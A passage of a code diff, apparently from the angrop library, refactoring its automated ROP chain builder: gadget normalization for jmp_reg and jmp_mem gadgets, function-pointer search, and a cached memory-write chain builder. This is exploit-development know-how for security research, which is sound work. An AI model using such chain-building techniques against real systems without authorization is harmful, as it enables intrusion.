self.chain_builder._reg_setter + if not reg_setter.can_set_reg(gadget.pc_reg): + return None + if gadget.pc_reg in pre_preserve or gadget.pc_reg in to_set_regs: + return None + + # choose the best gadget to set the PC for this jmp_reg gadget + for pc_setter in reg_setter._reg_setting_dict[gadget.pc_reg]: + if pc_setter.has_symbolic_access(): + continue + if pc_setter.changed_regs.intersection(pre_preserve): + continue + total_sc = gadget.stack_change + pc_setter.stack_change + gadgets = reg_setter._mixins_to_gadgets([pc_setter, gadget]) + try: + chain = reg_setter._build_reg_setting_chain(gadgets, {}) + rb = RopBlock.from_chain(chain) + + # TODO: technically, we should support chains like: + # pop rax; add eax, 0x1000; ret + ; call rax; + # but I'm too lazy to implement it atm + _, final_state = rb.sim_exec() + if final_state.ip.depth > 1: + continue + assert rb.stack_change == total_sc + return rb._gadgets[:-1] + except RopException: + pass + return None + + def _normalize_jmp_mem(self, gadget, pre_preserve=None, post_preserve=None): + if not self.chain_builder._can_do_write: + return None + if pre_preserve is None: + pre_preserve = set() + if post_preserve is None: + post_preserve = set() + + # calculate the number of bytes we need to shift after jmp_mem + # this handles out of patch access + mem_writer = self.chain_builder._mem_writer + stack_offsets = [] + for m in gadget.mem_reads + gadget.mem_writes + gadget.mem_changes: + if m.stack_offset is not None: + stack_offsets.append(m.stack_offset + self.project.arch.bytes) + if stack_offsets: + shift_size = max(stack_offsets) - gadget.stack_change + else: + shift_size = self.project.arch.bytes + + # make sure we can set the pc_target ast in the first place + needed_regs = set(x[5:].split('-', 1)[0] for x in gadget.pc_target.variables if x.startswith('sreg_')) + reg_setter = self.chain_builder._reg_setter + for reg in needed_regs: + if not reg_setter.can_set_reg(reg): + return None + + # if the target is not symbolic, make sure the target location is writable + if not gadget.pc_target.symbolic: + seg = self.project.loader.find_segment_containing(gadget.pc_target.concrete_value) + if not seg or not seg.is_writable: + return None + + try: + # step1: find a shifter that clean up the jmp_mem call + sc = abs(gadget.stack_change) + self.project.arch.bytes + shifter = None + # find the smallest shifter + shift_gadgets = self.chain_builder._shifter.shift_gadgets + keys = sorted(shift_gadgets.keys()) + shifter_list = [shift_gadgets[x] for x in keys if x >= sc] + if not shifter_list: + return None + shifter_list = itertools.chain.from_iterable(shifter_list) + for shifter in shifter_list: + if shifter.pc_offset < shift_size: + continue + if not shifter.changed_regs.intersection(post_preserve): + break + else: + return None + assert shifter.transit_type == 'pop_pc' + + # step2: write the shifter to a writable location + data = struct.pack(self.project.arch.struct_fmt(), shifter.addr) + if gadget.pc_target.symbolic: + ptr = self._get_ptr_to_writable(self.project.arch.bytes) + # we ensure the content it points to is zeroed out, so we don't need to write trailing 0s + # but we can't do so for GOT because they may have leftovers there + data = data.rstrip(b'\x00') + else: + ptr = gadget.pc_target.concrete_value + ptr_val = rop_utils.cast_rop_value(ptr, self.project) + chain = mem_writer.write_to_mem(ptr_val, data, fill_byte=b'\x00', preserve_regs=pre_preserve) + rb = RopBlock.from_chain(chain) + state = rb._blank_state + + # step3: identify the registers that we can't fully control yet in pc_target, then set them using RegSetter + _, final_state = rb.sim_exec() + try: + reg_solves, stack_solves = self._solve_ast_constraint(gadget.pc_target, ptr) + except claripy.errors.UnsatError: # type: ignore + return None + to_set_regs = {x:y for x,y in reg_solves.items() if x not in rb.popped_regs} + preserve_regs = set(reg_solves.keys()) - set(to_set_regs.keys()) + if any(x for x in to_set_regs if not self.chain_builder._reg_setter.can_set_reg(x)): + return None + if preserve_regs: + for reg in preserve_regs: + rb._blank_state.solver.add(final_state.registers.load(reg) == reg_solves[reg]) + if to_set_regs: + chain = self.set_regs(**to_set_regs, preserve_regs=preserve_regs.union(pre_preserve)) + rb += RopBlock.from_chain(chain) + + # step4: chain it with the jmp_mem gadget + # note that rb2 here is actually the gadget+shifter + # but shifter is written into memory, so ignore it when building rb2 + rb2 = RopBlock(self.project, self) + value = RopValue(gadget.addr, self.project) + value.rebase_analysis(chain=chain) + rb2.add_value(value) + + sc = shifter.stack_change + gadget.stack_change + state = rb2._blank_state + for offset in range(0, sc, self.project.arch.bytes): + if offset == shifter.pc_offset + gadget.stack_change: + val = state.solver.BVS("next_pc", self.project.arch.bits) + else: + # FIXME: currently, the endness handling is a mess. Need to rewrite this part in a uniformed way + # the following code is a compromise to the mess + arch_bytes = self.project.arch.bytes + idx = (rb.stack_change + offset)//arch_bytes + data = claripy.BVS(f"symbolic_stack_{idx}", self.project.arch.bits) + state.memory.store(state.regs.sp+rb.stack_change+offset, data) + addr = state.regs.sp+rb.stack_change+offset + val = state.memory.load(addr, arch_bytes, endness=self.project.arch.memory_endness) + rb2.add_value(val) + rb2.set_gadgets([gadget]) + for offset, val in stack_solves.items(): + # +1 because we insert a gadget before the stack patch + rb2._values[offset+1] = rop_utils.cast_rop_value(val, self.project) + + rb += rb2 + return rb + except (RopException, IndexError): + return None + + def normalize_gadget(self, gadget, pre_preserve=None, post_preserve=None, to_set_regs=None): + """ + pre_preserve: what registers to preserve before executing the gadget + post_preserve: what registers to preserve after executing the gadget + """ + try: + gadgets = [gadget] + + if pre_preserve is None: + pre_preserve = set() + if post_preserve is None: + post_preserve = set() + m = None + + # filter out gadgets with too many symbolic access + if gadget.num_sym_mem_access > 1: + return None + + # TODO: don't support these yet + if gadget.transit_type == 'jmp_mem': + if gadget.has_conditional_branch or gadget.has_symbolic_access(): + return None + + # at this point, we know for sure all gadget symbolic accesses should be normalized + # because they can't be jmp_mem gadgets + if gadget.has_symbolic_access(): + mem_accesses = gadget.mem_reads + gadget.mem_writes + gadget.mem_changes + sim_accesses = [x for x in mem_accesses if x.is_symbolic_access()] + assert len(sim_accesses) == 1, hex(gadget.addr) + m = sim_accesses[0] + pre_preserve = pre_preserve.union(m.addr_controllers) + + # normalize conditional branches + if gadget.has_conditional_branch: + tmp = self._normalize_conditional(gadget, preserve_regs=pre_preserve) + if tmp is None: + return None + gadgets = tmp + gadgets + + # normalize transit_types + if gadget.transit_type == 'jmp_reg': + tmp = self._normalize_jmp_reg(gadget, pre_preserve=pre_preserve, to_set_regs=to_set_regs) + if tmp is None: + return None + gadgets = tmp + gadgets + elif gadget.transit_type == 'jmp_mem': + rb = self._normalize_jmp_mem(gadget, pre_preserve=pre_preserve, post_preserve=post_preserve) + return rb + elif gadget.transit_type == 'pop_pc': + pass + else: + raise NotImplementedError() + + chain = self._build_reg_setting_chain(gadgets, {}) + rb = RopBlock.from_chain(chain) + + if rb is None: + return None + + # normalize non-positive stack_change + if gadget.stack_change <= 0: + shift_gadgets = self.chain_builder._shifter.shift_gadgets + sc = abs(gadget.stack_change) + self.project.arch.bytes + keys = sorted(shift_gadgets.keys()) + shifter_list = [shift_gadgets[x] for x in keys if x >= sc] + shifter_list = itertools.chain.from_iterable(shifter_list) + max_stack_offset = gadget.max_stack_offset + for shifter in shifter_list: + if shifter.pc_offset < abs(gadget.stack_change) + max_stack_offset + self.project.arch.bytes: + continue + if shifter.changed_regs.intersection(post_preserve): + continue + try: + chain = self._build_reg_setting_chain([rb, shifter], {}) + rb = RopBlock.from_chain(chain) + break + except RopException: + pass + else: + return None + + if rb is None: + return None + + # handle cases where the ropblock has out_of_patch accesses + # the solution is to shift the stack to contain the accesses + # FIXME: currently, we allow bytes*2 more bytes in shifting because of the mismatch on how + # stack_max_offset is calculated in ropblock and ropgadget + if rb.oop: + shift_gadgets = self.chain_builder._shifter.shift_gadgets + keys = sorted(shift_gadgets.keys()) + shifter_list = itertools.chain.from_iterable([shift_gadgets[k] for k in keys]) + for shifter in shifter_list: + if shifter.stack_change + rb.stack_change <= rb.max_stack_offset: + continue + if shifter.pc_offset == rb.max_stack_offset - rb.stack_change: + continue + try: + chain = self._build_reg_setting_chain([rb, shifter], {}) + rb = RopBlock.from_chain(chain) + rb._values = rb._values[:rb.stack_change//self.project.arch.bytes+1] + rb.payload_len = len(rb._values) * self.project.arch.bytes + break + except RopException: + pass + else: + return None + + # constrain memory accesses + if m is not None: + request = {} + for reg in m.addr_controllers: + data = claripy.BVS('sym_addr', self.project.arch.bits) + request[reg] = data + if request: + tmp = self.set_regs(**request) + tmp = RopBlock.from_chain(tmp) + _, final_state = tmp.sim_exec() + st = rb._blank_state + for reg in m.addr_controllers: + tmp._blank_state.solver.add(final_state.registers.load(reg) == st.registers.load(reg)) + rb = tmp + rb + else: # TODO:we currently don't support symbolizing address popped from stack + return None + return rb + + return rb + except (RopException, angr.errors.SimSolverModeError): + return None diff --git a/angrop/chain_builder/func_caller.py b/angrop/chain_builder/func_caller.py index 1874197a..aeadf47b 100644 --- a/angrop/chain_builder/func_caller.py +++ b/angrop/chain_builder/func_caller.py @@ -1,3 +1,4 @@ +import struct import logging import angr @@ -28,7 +29,7 @@ def __init__(self, chain_builder): self._cc = angr.default_cc( self.project.arch.name, platform=self.project.simos.name if self.project.simos is not None else None, - )(self.project.arch) + )(self.project.arch) # type:ignore def bootstrap(self): cc = self._cc @@ -44,33 +45,6 @@ def bootstrap(self): self._func_jmp_gadgets.add(g) break - def _is_valid_pointer(self, addr): - """ - Validate if an address is a legitimate pointer in the binary - Checks: - 1. Address is within memory ranges - 2. Address points to readable memory - 3. Address is aligned - """ - arch_bytes = self.project.arch.bytes - - # Check basic alignment - if addr % arch_bytes != 0: - return False - - # Check against memory ranges - if (addr < self.project.loader.min_addr or - addr >= self.project.loader.max_addr): - return False - - # Check readable writable sections - for section in self.project.loader.main_object.sections: - if (section.is_readable and - section.min_addr <= addr < section.max_addr): - return True - - return False - def _find_function_pointer_in_got_plt(self, func_addr): """ Search if a func addr is in plt. If it's in plt, find func name and @@ -105,23 +79,20 @@ def _find_function_pointer(self, func_addr): return got_ptr # Broader search strategy - for obj in self.project.loader.all_objects: - for section in obj.sections: - if not section.is_readable: - continue - - # Scan section for potential pointers - for offset in range(0, section.max_addr - section.min_addr, self.project.arch.bytes): - potential_ptr = section.min_addr + offset - try: - ptr_value = self.project.loader.memory.unpack_word(potential_ptr) - if (ptr_value == func_addr and - self._is_valid_pointer(potential_ptr)): - return potential_ptr - except Exception: # pylint: disable=broad-exception-caught - continue + func_ptr_bytes = struct.pack(self.project.arch.struct_fmt(), func_addr) + for seg in self.project.loader.main_object.segments: + if not seg.is_readable: + continue + if not seg.memsize: + continue - raise RopException("Could not find mem pointing to func in binary memory") + # Scan segments for potential pointers + sec_data = self.project.loader.memory.load(seg.min_addr, seg.memsize) + offset = sec_data.find(func_ptr_bytes) + if offset == -1: + continue + return seg.min_addr + offset + return None def _func_call(self, func_gadget, cc, args, extra_regs=None, preserve_regs=None, needs_return=True, jmp_mem_target=None, **kwargs): @@ -252,29 +223,41 @@ def func_call(self, address, args, **kwargs): registers = {self._cc.ARG_REGS[i]:register_args[i] for i in range(len(register_args))} reg_names = set(registers.keys()) ptr_to_func = self._find_function_pointer(address) - for g in self._func_jmp_gadgets: - if g.popped_regs.intersection(reg_names): - raise NotImplementedError("do not support func_jmp_gadgets that have pops") + hard_regs = [x for x in registers if not self.chain_builder._reg_setter.can_set_reg(x)] + if ptr_to_func is not None: + for g in self._func_jmp_gadgets: # type:ignore + if g.popped_regs.intersection(reg_names): + l.warning("do not support func_jmp_gadgets that have pops: %s", g.dstr()) + continue - # build the new target registers - registers = registers.copy() - for move in g.reg_moves: - if move.to_reg in registers.keys(): - val = registers[move.to_reg] - assert move.from_reg not in registers, "oops, overlapped moves not handled atm" - del registers[move.to_reg] - registers[move.from_reg] = val + # build the new target registers + registers = registers.copy() + skip = False + for move in g.reg_moves: + if move.from_reg in hard_regs or move.to_reg not in hard_regs: + skip = True + break + if move.to_reg in registers.keys(): + val = registers[move.to_reg] + if move.from_reg in registers: + l.warning("oops, overlapped moves not handled atm: %s", g.dstr()) + skip = True + break + del registers[move.to_reg] + registers[move.from_reg] = val + if skip: + continue - if g.transit_type != 'jmp_mem': - raise NotImplementedError("currently only support jmp_mem type func_jmp_gadgets!") - #func_gadget.stack_change = self.project.arch.bytes - #func_gadget.pc_offset = 0 - # try to invoke the function using the new target registers - try: - return self._func_call(g, self._cc, [], extra_regs=registers, - jmp_mem_target=ptr_to_func, **kwargs) - except RopException: - pass + if g.transit_type != 'jmp_mem': + raise NotImplementedError("currently only support jmp_mem type func_jmp_gadgets!") + #func_gadget.stack_change = self.project.arch.bytes + #func_gadget.pc_offset = 0 + # try to invoke the function using the new target registers + try: + return self._func_call(g, self._cc, [], extra_regs=registers, + jmp_mem_target=ptr_to_func, **kwargs) + except RopException: + pass s = symbol if symbol else hex(address) raise RopException(f"fail to invoke function: {s}") diff --git a/angrop/chain_builder/mem_changer.py b/angrop/chain_builder/mem_changer.py index 0203c081..921b2b39 100644 --- a/angrop/chain_builder/mem_changer.py +++ b/angrop/chain_builder/mem_changer.py @@ -6,6 +6,8 @@ from .builder import Builder from .. import rop_utils +from ..rop_block import RopBlock +from ..rop_gadget import RopGadget from ..errors import RopException l = logging.getLogger(__name__) @@ -16,8 +18,8 @@ class MemChanger(Builder): """ def __init__(self, chain_builder): super().__init__(chain_builder) - self._mem_change_gadgets = None - self._mem_add_gadgets = None + self._mem_change_gadgets: list[RopGadget] = None # type: ignore + self._mem_add_gadgets: list[RopGadget] = None # type: ignore def bootstrap(self): self._mem_change_gadgets = self._get_all_mem_change_gadgets(self.chain_builder.gadgets) @@ -40,39 +42,25 @@ def verify(self, chain, addr, value, _): if not set(state.regs.pc.variables).pop().startswith("next_pc_"): raise RopException("memory add fails - 3") - def _set_regs(self, *args, **kwargs): - return self.chain_builder._reg_setter.run(*args, **kwargs) - - def _same_effect(self, g1, g2): - change1 = g1.mem_changes[0] - change2 = g2.mem_changes[0] - - if change1.op != change2.op: - return False - if change1.data_size != change2.data_size: - return False - if change1.data_constant != change2.data_constant: - return False - if change1.addr_dependencies != change2.addr_dependencies: - return False - if change1.data_dependencies != change2.data_dependencies: - return False - return True - - def _better_than(self, g1, g2): - if g1.isn_count <= g2.isn_count and \ - g1.stack_change <= g2.stack_change and \ - len(g1.changed_regs) <= len(g2.changed_regs) and \ - g1.num_sym_mem_access <= g2.num_sym_mem_access: - return True - return False + def _effect_tuple(self, g): + change = g.mem_changes[0] + v1 = change.op + v2 = change.data_size + v3 = change.data_constant + v4 = tuple(sorted(change.addr_dependencies)) + v5 = tuple(sorted(change.data_dependencies)) + return (v1, v2, v3, v4, v5) + + def _comparison_tuple(self, g): + return (len(g.changed_regs), g.stack_change, g.num_sym_mem_access, + rop_utils.transit_num(g), g.isn_count) def _get_all_mem_change_gadgets(self, gadgets): possible_gadgets = set() for g in gadgets: if not g.self_contained: continue - sym_rw = set(m for m in g.mem_reads + g.mem_writes if m.is_symbolic_access()) + sym_rw = [m for m in g.mem_reads + g.mem_writes if m.is_symbolic_access()] if len(sym_rw) > 0 or len(g.mem_changes) != 1: continue for m_access in g.mem_changes: @@ -116,24 +104,8 @@ def add_to_mem(self, addr, value, data_size=None): if not possible_gadgets: raise RopException("Fail to find any gadget that can perform memory adding...") - # get the data from trying to set all the registers - registers = dict((reg, 0x41) for reg in self.chain_builder.arch.reg_set) - l.debug("getting reg data for mem adds") - _, _, reg_data = self.chain_builder._reg_setter.find_candidate_chains_graph_search(max_stack_change=0x50, - **registers) - l.debug("trying mem_add gadgets") - - # filter out gadgets that certainly cannot be used for add_mem - # e.g. we can't set needed registers - gadgets = set() - for t, _ in reg_data.items(): - for g in possible_gadgets: - mem_change = g.mem_changes[0] - if (set(mem_change.addr_dependencies) | set(mem_change.data_dependencies)).issubset(set(t)): - gadgets.add(g) - # sort the gadgets with number of memory accesses and stack_change - gadgets = self._sort_gadgets(gadgets) + gadgets = self._sort_gadgets(possible_gadgets) if not gadgets: raise RopException("Couldnt set registers for any memory add gadget") @@ -163,7 +135,8 @@ def _add_mem_with_gadget(self, gadget, addr, data_size, final_val=None, differen # constrain the successor to be at the gadget # emulate 'pop pc' - test_state = self.make_sim_state(gadget.addr) + arch_bytes = self.project.arch.bytes + test_state = self.make_sim_state(gadget.addr, gadget.stack_change//arch_bytes) if difference is not None: test_state.memory.store(addr.concreted, claripy.BVV(~(difference.concreted), data_size)) # pylint:disable=invalid-unary-operand-type @@ -209,13 +182,7 @@ def _add_mem_with_gadget(self, gadget, addr, data_size, final_val=None, differen for reg in set(all_deps): reg_vals[reg] = test_state.solver.eval(test_state.registers.load(reg)) - chain = self._set_regs(**reg_vals) - chain.add_gadget(gadget) - - bytes_per_pop = self.project.arch.bytes - for offset in range(0, gadget.stack_change, bytes_per_pop): - if offset == gadget.pc_offset: - chain.add_value(claripy.BVS("next_pc", self.project.arch.bits)) - else: - chain.add_value(self._get_fill_val()) + chain = self.set_regs(**reg_vals) + chain = RopBlock.from_chain(chain) + chain = self._build_reg_setting_chain([chain, gadget], {}) return chain diff --git a/angrop/chain_builder/mem_writer.py b/angrop/chain_builder/mem_writer.py index 9d396fe6..7fefc5ba 100644 --- a/angrop/chain_builder/mem_writer.py +++ b/angrop/chain_builder/mem_writer.py @@ -1,4 +1,6 @@ +import struct import logging +from collections import defaultdict import angr import claripy @@ -8,8 +10,132 @@ from ..errors import RopException from ..rop_chain import RopChain from ..rop_value import RopValue +from ..rop_block import RopBlock +from ..rop_gadget import RopGadget -l = logging.getLogger("angrop.chain_builder.mem_writer") +l = logging.getLogger(__name__) + +class MemWriteChain: + """ + cached memory writing chain, we only need to concretize the variables in the chain to + generate a new chain + """ + def __init__(self, builder, gadget, preserve_regs): + self.project = builder.project + self.builder = builder + self.gadget = gadget + self.preserve_regs = preserve_regs + mem_write = self.gadget.mem_writes[0] + self.addr_bv = claripy.BVS("addr", mem_write.addr_size) + self.data_bv = claripy.BVS("data", mem_write.data_size) + self.state = builder.make_sim_state(gadget.addr, gadget.stack_change//self.project.arch.bytes+1) + self.chain = self._build_chain() + + def _build_chain(self): + mem_write = self.gadget.mem_writes[0] + + # step through the state once to identify the mem_write action + state = self.state + final_state = rop_utils.step_to_unconstrained_successor(self.project, state) + the_action = None + for a in final_state.history.actions.hardcopy: + if a.type != "mem" or a.action != "write": + continue + if set(rop_utils.get_ast_dependency(a.addr.ast)) == set(mem_write.addr_dependencies) and \ + set(rop_utils.get_ast_dependency(a.data.ast)) == set(mem_write.data_dependencies): + the_action = a + break + else: + raise RopException("Couldn't find the matching action") + + # they both need to contain one single variable + addr_ast = the_action.addr.ast + data_ast = the_action.data.ast + assert len(addr_ast.variables) == 1 and len(data_ast.variables) == 1 + + # check the register values + reg_vals = {} + constrained_addrs = None + for ast, bv, t in [(addr_ast, self.addr_bv, 'addr'), (data_ast, self.data_bv, 'data')]: + # in case of short write + if bv.size() < ast.size(): + bv = claripy.ZeroExt(ast.size() - bv.size(), bv) + variable = list(ast.variables)[0] + if variable.startswith('sreg_'): + reg_vals[variable.split('-', 1)[0][5:]] = self.builder._rebalance_ast(ast, bv, mode='reg')[1] + elif variable.startswith('symbolic_stack_'): + if t == 'addr': + assert constrained_addrs is None + constrained_addrs = [ast] + else: + raise RuntimeError("what variable this is?") + + chain = self.builder.set_regs(**reg_vals, preserve_regs=self.preserve_regs) + chain = RopBlock.from_chain(chain) + chain = self.builder._build_reg_setting_chain([chain, self.gadget], {}, constrained_addrs=constrained_addrs) + + if not constrained_addrs: + return chain + addr_ast = constrained_addrs[0] + addr_ast_vars = addr_ast.variables + for _, val in enumerate(chain._values): + if not val.symbolic: + continue + if not addr_ast_vars.intersection(val.ast.variables): + continue + ast = self.builder._rebalance_ast(addr_ast, self.addr_bv)[1] + # FIXME: again endness issue + if ast.op == 'Reverse': + ast = ast.args[0] + val._value = ast + break + return chain + + def concretize(self, addr_val, data): + chain = self.chain.copy() + fmt = self.project.arch.struct_fmt() + arch_bytes = self.project.arch.bytes + arch_bits = self.project.arch.bits + # replace addr and data + for idx, val in enumerate(chain._values): + if not val.symbolic or not val.ast.variables: + continue + if list(val.ast.variables)[0].startswith('addr_'): + test_ast = claripy.algorithm.replace(expr=val.ast, + old=self.addr_bv, + new=addr_val.data) + new = addr_val.copy() + new._value = test_ast + if addr_val._rebase: + new.rebase_ptr() + chain._values[idx] = new + continue + if list(val.ast.variables)[0].startswith('data_'): + var = claripy.BVV(struct.unpack(fmt, data.ljust(arch_bytes, b'\x00'))[0], len(self.data_bv)) + test_ast = claripy.algorithm.replace(expr=val.ast, + old=self.data_bv, + new=var) + if len(test_ast) < arch_bits: # type: ignore + test_ast = claripy.ZeroExt(arch_bits-len(test_ast), test_ast) # type: ignore + # since this is data, we assume it should not be rebased + val = RopValue(test_ast, self.project) + val._rebase = False + chain._values[idx] = val + continue + if list(val.ast.variables)[0].startswith('symbolic_stack_'): + # FIXME: my lazy implementation, the endness mess really needs to be rewritten + tmp = claripy.BVS(f"symbolic_stack_{idx}", arch_bits) + if self.project.arch.memory_endness == 'Iend_LE': + tmp = claripy.Reverse(tmp) + chain._values[idx] = RopValue(tmp, self.project) + return chain + + @property + def changed_regs(self): + s = set() + for g in self.chain._gadgets: + s |= g.changed_regs + return s class MemWriter(Builder): """ @@ -18,33 +144,35 @@ class MemWriter(Builder): """ def __init__(self, chain_builder): super().__init__(chain_builder) - self._mem_write_gadgets: set = None # type: ignore - self._good_mem_write_gadgets: set = None # type: ignore + self._mem_write_gadgets: set[RopGadget] = None # type: ignore + self._good_mem_write_gadgets: dict = None # type: ignore + self._mem_write_chain_cache = defaultdict(list) def bootstrap(self): self._mem_write_gadgets = self._get_all_mem_write_gadgets(self.chain_builder.gadgets) - self._good_mem_write_gadgets = set() - - def _set_regs(self, *args, **kwargs): - return self.chain_builder._reg_setter.run(*args, **kwargs) + self._good_mem_write_gadgets = defaultdict(set) @staticmethod def _get_all_mem_write_gadgets(gadgets): + """ + we consider a gadget mem_write gadget if + 1. it is self-contained + 2. there is only one symbolic memory access and it is a memory write + 3. addr/data are independent + """ possible_gadgets = set() for g in gadgets: if not g.self_contained: continue - sym_rw = set(m for m in g.mem_reads + g.mem_changes if m.is_symbolic_access()) + sym_rw = [m for m in g.mem_reads + g.mem_changes if m.is_symbolic_access()] if len(sym_rw) > 0 or len(g.mem_writes) != 1: continue - if g.stack_change <= 0: - continue for m_access in g.mem_writes: if m_access.addr_controllable() and m_access.data_controllable() and m_access.addr_data_independent(): possible_gadgets.add(g) return possible_gadgets - def _better_than(self, g1, g2): + def _better_than(self, g1, g2): # pylint: disable=no-self-use if g1.stack_change > g2.stack_change: return False if g1.num_sym_mem_access > g2.num_sym_mem_access: @@ -53,51 +181,54 @@ def _better_than(self, g1, g2): return False if not g1.changed_regs.issubset(g2.changed_regs): return False + if rop_utils.transit_num(g1) > rop_utils.transit_num(g2): + return False return True - def _gen_mem_write_gadgets(self, string_data): + def _gen_mem_write_gadgets(self, string_data, cache_key): # create a dict of bytes per write to gadgets # assume we need intersection of addr_dependencies and data_dependencies to be 0 # TODO could allow mem_reads as long as we control the address? # generate from the cache first - if self._good_mem_write_gadgets: - yield from self._good_mem_write_gadgets + if self._good_mem_write_gadgets[cache_key]: + yield from self._good_mem_write_gadgets[cache_key] - possible_gadgets = {g for g in self._mem_write_gadgets.copy() if g.transit_type != 'jmp_reg'} - possible_gadgets -= self._good_mem_write_gadgets # already yield these + # now look for gadgets that require least stack change + possible_gadgets = {g for g in self._mem_write_gadgets if g.self_contained} + possible_gadgets -= self._good_mem_write_gadgets[cache_key] # already yield these - # use the graph-search to gain a rough idea about (stack_change, register setting) - registers = dict((reg, 0x41) for reg in self.arch.reg_set) - l.debug("getting reg data for mem writes") reg_setter = self.chain_builder._reg_setter - _, _, reg_data = reg_setter.find_candidate_chains_graph_search(max_stack_change=0x50, **registers) - l.debug("trying mem_write gadgets") - - # find a write gadget that induces the smallest stack_change + can_set_regs = {x for x in reg_setter._reg_setting_dict if reg_setter._reg_setting_dict[x]} while possible_gadgets: + to_remove = set() # limit the maximum size of the chain best_stack_change = 0x400 best_gadget = None - # regs: according to the graph search, what registers can be controlled - # vals[1]: stack_change to set those registers - for regs, vals in reg_data.items(): - reg_set_stack_change = vals[1] - if reg_set_stack_change > best_stack_change: + + for g in possible_gadgets: + mem_write = g.mem_writes[0] + dep_regs = mem_write.addr_dependencies | mem_write.data_dependencies + if not dep_regs.issubset(can_set_regs): + to_remove.add(g) continue - for g in possible_gadgets: - mem_write = g.mem_writes[0] - if not (mem_write.addr_dependencies | mem_write.data_dependencies).issubset(regs): - continue - stack_change = g.stack_change + reg_set_stack_change - bytes_per_write = mem_write.data_size // 8 - num_writes = (len(string_data) + bytes_per_write - 1)//bytes_per_write - stack_change *= num_writes - if stack_change < best_stack_change: - best_gadget = g - best_stack_change = stack_change - if stack_change == best_stack_change and self._better_than(g, best_gadget): - best_gadget = g + + # estimate the stack_change cost of the gadget + stack_change = g.stack_change + for reg in dep_regs: + stack_change += reg_setter._reg_setting_dict[reg][0].stack_change + bytes_per_write = mem_write.data_size // 8 + num_writes = (len(string_data) + bytes_per_write - 1)//bytes_per_write + stack_change *= num_writes + + if stack_change < best_stack_change: + best_gadget = g + best_stack_change = stack_change + if stack_change == best_stack_change and (best_gadget is None or self._better_than(g, best_gadget)): + best_gadget = g + + if to_remove: + possible_gadgets -= to_remove if best_gadget: possible_gadgets.remove(best_gadget) @@ -106,7 +237,7 @@ def _gen_mem_write_gadgets(self, string_data): break @rop_utils.timeout(5) - def _try_write_to_mem(self, gadget, use_partial_controllers, addr, string_data, fill_byte): + def _try_write_to_mem(self, gadget, addr, string_data, preserve_regs, fill_byte): gadget_code = str(self.project.factory.block(gadget.addr).capstone) l.debug("building mem_write chain with gadget:\n%s", gadget_code) mem_write = gadget.mem_writes[0] @@ -115,101 +246,88 @@ def _try_write_to_mem(self, gadget, use_partial_controllers, addr, string_data, # there should be only two cases. Either it is a string, or it is a single badbyte chain = RopChain(self.project, self, badbytes=self.badbytes) if len(string_data) == 1 and ord(string_data) in self.badbytes: - chain += self._write_to_mem_with_gadget(gadget, addr, string_data, use_partial_controllers) + chain += self._write_to_mem_with_gadget_with_cache(gadget, addr, string_data, preserve_regs) else: - bytes_per_write = mem_write.data_size//8 if not use_partial_controllers else 1 + bytes_per_write = mem_write.data_size//8 for i in range(0, len(string_data), bytes_per_write): to_write = string_data[i: i+bytes_per_write] # pad if needed if len(to_write) < bytes_per_write and fill_byte: to_write += fill_byte * (bytes_per_write-len(to_write)) - chain += self._write_to_mem_with_gadget(gadget, addr + i, to_write, use_partial_controllers) + chain += self._write_to_mem_with_gadget_with_cache(gadget, addr + i, to_write, preserve_regs) return chain - def _write_to_mem(self, addr, string_data, fill_byte=b"\xff"):# pylint:disable=inconsistent-return-statements + def _write_to_mem(self, addr, string_data, preserve_regs=None, fill_byte=b"\xff"):# pylint:disable=inconsistent-return-statements """ :param addr: address to store the string :param string_data: string to store :param fill_byte: a byte to use to fill up the string if necessary :return: a rop chain """ - for gadget in self._gen_mem_write_gadgets(string_data): + if preserve_regs is None: + preserve_regs = set() + + key = (len(string_data), tuple(sorted(preserve_regs))) + for gadget in self._gen_mem_write_gadgets(string_data, key): + # sanity checks, make sure it doesn't clobber any preserved_regs + if gadget.changed_regs.intersection(preserve_regs): + continue + mem_write = gadget.mem_writes[0] + all_deps = mem_write.addr_dependencies | mem_write.data_dependencies + if all_deps.intersection(preserve_regs): + continue + + # actually trying each gadget and cache the good gadgets try: - chain = self._try_write_to_mem(gadget, False, addr, string_data, fill_byte) - self._good_mem_write_gadgets.add(gadget) + chain = self._try_write_to_mem(gadget, addr, string_data, preserve_regs, fill_byte) + self._good_mem_write_gadgets[key].add(gadget) return chain except (RopException, angr.errors.SimEngineError, angr.errors.SimUnsatError): pass raise RopException("Fail to write data to memory :(") - def write_to_mem(self, addr, data, fill_byte=b"\xff"): - - # sanity check - if not (isinstance(fill_byte, bytes) and len(fill_byte) == 1): - raise RopException("fill_byte is not a one byte string, aborting") - if not isinstance(data, bytes): - raise RopException("data is not a byte string, aborting") - if ord(fill_byte) in self.badbytes: - raise RopException("fill_byte is a bad byte!") - - # split the string into smaller elements so that we can - # handle bad bytes - if all(x not in self.badbytes for x in data): - elems = [data] - else: - elems = [] - e = b'' - for x in data: - if x not in self.badbytes: - e += bytes([x]) - else: - if e: - elems.append(e) - elems.append(bytes([x])) - e = b'' - if e: - elems.append(e) - - # do the write - offset = 0 - chain = RopChain(self.project, self, badbytes=self.badbytes) - for elem in elems: - ptr = addr + offset - if self._word_contain_badbyte(ptr): - raise RopException(f"{ptr} contains bad byte!") - if len(elem) != 1 or ord(elem) not in self.badbytes: - chain += self._write_to_mem(ptr, elem, fill_byte=fill_byte) - offset += len(elem) - else: - chain += self._write_to_mem(ptr, elem, fill_byte=fill_byte) - offset += 1 - return chain + def _write_to_mem_with_gadget_with_cache(self, gadget, addr_val, data, preserve_regs): + mem_write = gadget.mem_writes[0] + if len(mem_write.addr_dependencies) <= 1 and len(mem_write.data_dependencies) <= 1 and \ + mem_write.data_size in (32, 64): + if not self._mem_write_chain_cache[gadget]: + try: + cache_chain = MemWriteChain(self, gadget, preserve_regs) + self._mem_write_chain_cache[gadget].append(cache_chain) + except RopException: + pass + for cache_chain in self._mem_write_chain_cache[gadget]: + if cache_chain.changed_regs.intersection(preserve_regs): + continue + chain = cache_chain.concretize(addr_val, data) + state = chain.exec() + sim_data = state.memory.load(addr_val.data, len(data)) + if state.solver.eval(sim_data, cast_to=bytes) == data: + return chain + l.error("write_to_mem_with_gadget_with_cache failed: %s %s %s\n%s\n%s", addr_val, + data, preserve_regs, gadget.dstr(), sim_data) + continue + return self._write_to_mem_with_gadget(gadget, addr_val, data, preserve_regs) - def _write_to_mem_with_gadget(self, gadget, addr_val, data, use_partial_controllers=False): + def _write_to_mem_with_gadget(self, gadget, addr_val, data, preserve_regs): """ addr_val is a RopValue """ addr_bvs = claripy.BVS("addr", self.project.arch.bits) - - # sanity check for simple gadget - if len(gadget.mem_writes) != 1 or 